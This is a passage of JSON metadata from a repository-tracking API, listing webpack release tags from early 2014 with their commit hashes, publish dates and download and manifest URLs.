ack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","pu